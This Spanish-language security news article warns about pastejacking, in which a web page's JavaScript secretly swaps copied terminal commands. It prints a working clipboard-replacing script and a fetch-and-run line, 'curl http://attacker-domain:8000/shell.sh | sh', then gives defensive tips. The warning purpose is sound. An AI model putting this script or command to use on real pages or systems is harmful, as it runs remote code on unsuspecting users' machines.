Así te pueden hackear por copiar y pegar comandos desde una web

Casi todos hemos copiado un comando desde la web para pegarlo en el terminal. No es algo que hagan solo usuarios novatos en Linux, sino en cualquier sistema, y es tan común entre los mismos desarrolladores -hasta los más veteranos- que la misma Stack Overflow convirtió su teclado para 'copiar y pegar' en un gadget real con bastante demanda.

Pero el especialista en ciberseguridad Gabriel Friedlander, acaba de mostrar un "simple truco con el que te pueden hackear por un copy paste accidental". Para Gabriel, la demostración que ha publicado en su web es más que razón suficiente por la que nunca deberíamos copiar comandos desde la web directamente en nuestra terminal. 

Cuando crees que estás copiando algo pero es reemplazado por otro código

Friedlander explica que lo único que hace falta es una simple línea de código inyectada dentro del código que estás copiando para crear una puerta trasera a tu app. De hecho, puedes hacer la prueba directamente en su blog copiando un comando común y corriente que muchos hemos usado en Linux: "sudo apt update".

¡Cuidado con el código que copias de una web! Podrían hackearte

Copiar comandos de una web puede ser peligroso

Es común que programadores o administradores de sistemas y aficionados a la tecnología en general copien y peguen comandos de sitios web en una terminal. 

Si entras en el blog en cuestión y copias el código y lo pegas en el cajón debajo (o en cualquier otro lugar como tu bloc de notas), puedes ver como lo que pegaste es completamente diferente al comando copiado. En este caso se trata de un comando malicioso, y el detalle importante aquí es que al pegarlo se añade una nueva línea automáticamente.

• https://www.wizer-training.com/blog/copy-paste

Esto quiere decir que cuando hayas pegado el comando ya será demasiado tarde, puesto que añadir una nueva línea hace que la terminal ejecute automáticamente el comando, así que sin importar que hayas notado que el comando que pegaste no es el correcto, ya no podrás hacer nada para evitar su ejecución. 

Truco JavaScript

De 

sudo apt update

a

curl http://attacker-domain:8000/shell.sh | sh

Javascript 

<script>
document.getElementById('copy').addEventListener('copy', function(e) { e.clipboardData.setData('text/plain', 'curl http://attacker-domain:8000/shell.sh | sh\n'); e.preventDefault(); });
 </script>

Todo este "truco" se debe únicamente a un simple segmento de JavaScript inyectado en la página que cambiará el texto copiado al portapapeles. Al copiar el comando un "event listener" se activa cuando el usuario hace click en el botón "copiar" y reemplaza el texto inicial con el código malicioso. 

Este tipo de scripts tienen obviamente usos legítimos, pero este es un ejemplo de cómo se puede explotar para el mal de forma creativa, y quizás sirve de advertencia para no copiar comandos desde cualquier lugar extraño en Internet.

Una recomendación de Gabriel para prevenir esto es que podemos añadir un "#" detrás del código antes de pegarlo para convertirlo en un comentario y que no se ejecute. Una recomendación de Gabriela, es pegar el código antes en cualquier otro lado que no sea la terminal para verificar que estás pegando el contenido original y nadie te está jugando una.

# comando 

Fuentes:

https://www.bleepingcomputer.com/news/security/dont-copy-paste-commands-from-webpages-you-can-get-hacked/ 

https://www.genbeta.com/seguridad/asi-facil-te-pueden-hackear-copiar-pegar-comandos-web